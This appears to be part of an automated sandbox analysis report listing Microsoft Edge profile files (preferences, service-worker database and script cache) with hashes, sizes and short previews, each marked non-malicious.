                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4586d.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4ad92.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4dffc.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                  Entropy (8bit):4.051821770808046
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                  MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                  SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                  SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                  SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34462
                                                                                                                                                                  Entropy (8bit):5.558788214244173
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBlZWPOkfUl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVxCVw3rwyTTDdKpvtu6:fgkBlZWPOkfUlu1jagEwkyTt6t1
                                                                                                                                                                  MD5:C5ACC78339F79F1814A1509DCF475755
                                                                                                                                                                  SHA1:157B6BAEBDA80954E7146017456139E44AA94664
                                                                                                                                                                  SHA-256:61FD1E345F09C2E2A90C65A59F8C65C84A665CC6DCEE069F81AE3B198A6B23E5
                                                                                                                                                                  SHA-512:08027B14E071D2A3CC4A7E9756C135D407C76AC78A076B1F19437889DAB29AFE1E2085C58D1138DAABCA6976A2AD2DA9C0AD5B2DE1BA5790AD22CEAE1966DEE1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4409f.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34462
                                                                                                                                                                  Entropy (8bit):5.558788214244173
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBlZWPOkfUl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVxCVw3rwyTTDdKpvtu6:fgkBlZWPOkfUlu1jagEwkyTt6t1
                                                                                                                                                                  MD5:C5ACC78339F79F1814A1509DCF475755
                                                                                                                                                                  SHA1:157B6BAEBDA80954E7146017456139E44AA94664
                                                                                                                                                                  SHA-256:61FD1E345F09C2E2A90C65A59F8C65C84A665CC6DCEE069F81AE3B198A6B23E5
                                                                                                                                                                  SHA-512:08027B14E071D2A3CC4A7E9756C135D407C76AC78A076B1F19437889DAB29AFE1E2085C58D1138DAABCA6976A2AD2DA9C0AD5B2DE1BA5790AD22CEAE1966DEE1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2394
                                                                                                                                                                  Entropy (8bit):5.807278033267805
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:F2xc5NmccncmoDCRORpllg2hEEfRHGbldCRORpllg2hR7yHXFCRORpllg2hEnRHv:F2emlMrd6EfBirdn2Hvrd6nBXrd1Bx
                                                                                                                                                                  MD5:E26A8488EB798ED79B7BB5213D7467CF
                                                                                                                                                                  SHA1:874979916A2D798E1994914D91C0BAC017A54EC4
                                                                                                                                                                  SHA-256:527BD7FB01441201B7FF90DA2BAA9A39F1895A489E710F4C959C32220AA690F8
                                                                                                                                                                  SHA-512:DE196099B7B698547F7895DA547DF5835BF7C3467C8331D68C93817A52DFE41B572F6CDC35D222C5F41B8A142A038BD3E633C4207A967986DB0DA9DD1396B42B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2l.7.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):295
                                                                                                                                                                  Entropy (8bit):5.183883386369156
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/3QQERM1wkn23oH+TcwtE/a252KLl9mq2Pwkn23oH+TcwtE/a2ZIFUv:7/gRRrfYeb8xLzmvYfYeb8J2FUv
                                                                                                                                                                  MD5:B5473A186501784C47097A7E1FD8EBED
                                                                                                                                                                  SHA1:AEA57F6AFBCA6140227B1CFB1655E5AB62BD1D09
                                                                                                                                                                  SHA-256:AC064A872C5B116DD73B076698A1B31564849ED00CAABE9693F548C600A76326
                                                                                                                                                                  SHA-512:FF66CF1A60925978F98450662B51D666FE95C71AA3F18704580F3CBA3D695E55CEED124E552765A2047A151E94F85E26FFD44A30CF868A82979A440B74681DFA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:06.138 d04 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/06-17:18:06.163 d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):115273
                                                                                                                                                                  Entropy (8bit):5.578961166434388
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtrbXMTQ12Vv:B9LyxPXfOxr1lMe1nL/5L/TXJ6zQ0C
                                                                                                                                                                  MD5:2CA47C0F5EE979EC5FC813E9F7C01C37
                                                                                                                                                                  SHA1:B93D0787AEB9E04C36B4860AC7CE4EA61D905AC4
                                                                                                                                                                  SHA-256:397ED8197C5C1388B9E6A634528EDDF7D76F2C1415A59CB40E6C0D557791F310
                                                                                                                                                                  SHA-512:1B54869864BFBA7B0B8D43C4F79CA5A2C5E5DF212778AC505DCB1EFC72AD5614A6450A8D1DB955F306D3A43ED5D13344F50C338612D09DADD013FE4866917930
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):189849
                                                                                                                                                                  Entropy (8bit):6.388422592238106
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:Nob67lwlvew7DimnVIL/Fr6U9XtJAUEH53ipbt:GewqmnKL/F+OTAQL
                                                                                                                                                                  MD5:3313DB66088908126229F22A3EB3986D
                                                                                                                                                                  SHA1:9D5EE5636E48033F620E864582B15169AAE3A704
                                                                                                                                                                  SHA-256:0E9746672626354031FF156DF3A36A610DDDBE6C2CB6EF6CBBD322D948310226
                                                                                                                                                                  SHA-512:073E19431CB7C1C5E186F6B23B29AD023A1BF1A3C7621BCB227B137D905A5511BCF39C49AAE9B91CBA63CEA53FA4C0A851FB7095F0B91E8A712C33787A03C341
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..........rSG.....0....Lp.................;\......*@........,T.8..`,.....L`.....,T...`......L`......Rc6u......exports...Rc:......module....RcF..W....define....Rb..[n....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q...&.d.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....`...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24
                                                                                                                                                                  Entropy (8bit):2.1431558784658327
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:m+l:m
                                                                                                                                                                  MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                  SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                  SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                  SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:0\r..m..................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HALtAyXl/l7n/lxEstllTXWNn:gLyKEs8N
                                                                                                                                                                  MD5:0BAE4AE3A96D1568B5AF281682EAE4E4
                                                                                                                                                                  SHA1:1443E27122F3BE7C8671E53C5657DF3B58BD26EE
                                                                                                                                                                  SHA-256:DF33AC5B5FE6E26E6552805FF4DB4B3FF7F72FE9FBCC017ED0982B883512994E
                                                                                                                                                                  SHA-512:08F035FF499C31B47D49ED54003D2DC300AFBEB37327A5EFD102FB4EED268D9EAED0E2E47372B8E24A51B6473CBBBCB0A1053279A8DCB1AAC9486167AAB84FA7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...2%..oy retne.........................X....,.................GPI../.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HALtAyXl/l7n/lxEstllTXWNn:gLyKEs8N
                                                                                                                                                                  MD5:0BAE4AE3A96D1568B5AF281682EAE4E4
                                                                                                                                                                  SHA1:1443E27122F3BE7C8671E53C5657DF3B58BD26EE
                                                                                                                                                                  SHA-256:DF33AC5B5FE6E26E6552805FF4DB4B3FF7F72FE9FBCC017ED0982B883512994E
                                                                                                                                                                  SHA-512:08F035FF499C31B47D49ED54003D2DC300AFBEB37327A5EFD102FB4EED268D9EAED0E2E47372B8E24A51B6473CBBBCB0A1053279A8DCB1AAC9486167AAB84FA7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...2%..oy retne.........................X....,.................GPI../.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF45204.TMP (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                  Entropy (8bit):3.5931902015385067
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:HALtAyXl/l7n/lxEstllTXWNn:gLyKEs8N
                                                                                                                                                                  MD5:0BAE4AE3A96D1568B5AF281682EAE4E4
                                                                                                                                                                  SHA1:1443E27122F3BE7C8671E53C5657DF3B58BD26EE
                                                                                                                                                                  SHA-256:DF33AC5B5FE6E26E6552805FF4DB4B3FF7F72FE9FBCC017ED0982B883512994E
                                                                                                                                                                  SHA-512:08F035FF499C31B47D49ED54003D2DC300AFBEB37327A5EFD102FB4EED268D9EAED0E2E47372B8E24A51B6473CBBBCB0A1053279A8DCB1AAC9486167AAB84FA7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...2%..oy retne.........................X....,.................GPI../.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

